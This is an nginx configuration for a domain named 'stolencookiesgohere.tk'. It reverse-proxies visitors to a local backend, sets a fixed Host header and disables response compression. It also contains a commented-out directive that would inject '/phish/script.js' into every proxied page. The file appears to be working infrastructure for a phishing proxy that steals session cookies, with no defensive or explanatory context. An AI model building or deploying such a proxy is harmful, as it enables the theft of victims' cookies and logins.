server {
    listen 80;
    server_name stolencookiesgohere.tk;
 
    allow all;

    root   /usr/share/nginx/html;
    index  index.html index.htm;
 
    location / {
        proxy_pass  http://localhost:8000;
        proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504;
        proxy_redirect off;
        proxy_buffering off;
        proxy_set_header         Host            stolencookiesgohere.tk;
        proxy_set_header	 Accept-Encoding "";
	#proxy_set_header        X-Real-IP       $remote_addr;
        #proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
	#add_after_body /phish/script.js;
    }

}
